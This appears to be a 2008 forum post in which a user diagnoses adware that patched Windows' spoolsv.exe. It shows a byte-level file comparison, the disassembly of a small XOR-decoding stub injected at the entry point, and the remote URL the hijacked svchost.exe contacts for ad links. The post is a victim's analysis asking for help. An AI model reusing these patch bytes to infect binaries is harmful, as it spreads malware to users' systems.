[Old post] [Notice] A fairly nasty adware program
Posted: 2008-10-28 20:26
Not long after opening IE, a browser advertisement popped up every minute or two. I assumed that removing a few startup entries, services and BHOs would be enough, but none of those were the problem; after searching for a long time I discovered that spoolsv.exe had been modified!
C:\WINDOWS\system32>fc spoolsv2.exe spoolsv.
正在比较文件 spoolsv2.exe 和 SPOOLSV.EXE
00000118: 70 1B
00000119: CA 46
0000BE70: E8 00
0000BE75: 58 00
0000BE76: 60 00
0000BE77: B9 00
0000BE78: 1D 00
0000BE79: 6F 00
0000BE7A: 0C 00
0000BE7B: 52 00
0000BE7C: 68 00
0000BE7D: 73 00
0000BE7E: 1B 00
0000BE7F: 0C 00
0000BE80: 52 00
0000BE81: 31 00
0000BE82: 0C 00
0000BE83: 24 00
0000BE84: 68 00
0000BE85: 7C 00
0000BE86: 0B 00
0000BE87: 7F 00
0000BE88: 3E 00
0000BE89: 31 00
0000BE8A: 0C 00
0000BE8B: 24 00
0000BE8C: 54 00
0000BE8D: 05 00
0000BE8E: 47 00
0000BE8F: 46 00
0000BE90: FF 00
0000BE91: FF 00
0000BE92: 8B 00
0000BE93: 18 00
0000BE94: FF 00
0000BE95: D3 00
0000BE96: 58 00
0000BE97: 5B 00
0000BE98: 61 00
0000BE99: E9 00
0000BE9A: 7D 00
0000BE9B: 7B 00
0000BE9C: FF 00
0000BE9D: FF 00
Clearly the entry point of spoolsv.exe was modified and a small amount of code was added. The disassembly is as follows:
//******************** Program Entry Point ********
:0100CA70 E800000000 call 0100CA75
* Referenced by a CALL at Address:
|:0100CA70
|
:0100CA75 58 pop eax
:0100CA76 60 pushad
:0100CA77 B91D6F0C52 mov ecx, 520C6F1D
:0100CA7C 68731B0C52 push 520C1B73
:0100CA81 310C24 xor dword ptr [esp], ecx
:0100CA84 687C0B7F3E push 3E7F0B7C
:0100CA89 310C24 xor dword ptr [esp], ecx
:0100CA8C 54 push esp
:0100CA8D 054746FFFF add eax, FFFF4647
:0100CA92 8B18 mov ebx, dword ptr [eax]
:0100CA94 FFD3 call ebx
:0100CA96 58 pop eax
:0100CA97 5B pop ebx
:0100CA98 61 popad
:0100CA99 E97D7BFFFF jmp 0100461B
:0100CA9E 00000000000000000000 BYTE 10 DUP(0)
:0100CAA8 00000000000000000000 BYTE 10 DUP(0)
:0100CAB2 00000000000000000000 BYTE 10 DUP(0)
:0100CABC 00000000000000000000 BYTE 10 DUP(0)
:0100CAC6 00000000000000000000 BYTE 10 DUP(0)
I can't make sense of this code, so I'm asking everyone here for advice.
After I restored spoolsv.exe the system went back to normal. I don't understand how so little code can do all of this:
After the print service starts, the modified spoolsv.exe launches another process, c:\windows\system32\svchost.exe
(svchost.exe itself is not modified; it runs without arguments, unlike the system service instances). That svchost.exe fetches
a long string from http://ini.officesupdate.net/dream/dream.php (found by packet capture;
I guess it is encrypted advertising URLs), and then, while the user is browsing, opens those URLs from time to time. After I
killed the svchost.exe process the ads stopped popping up, so svchost.exe was obviously hijacked,
but when I checked its modules nothing was wrong! I just don't get it.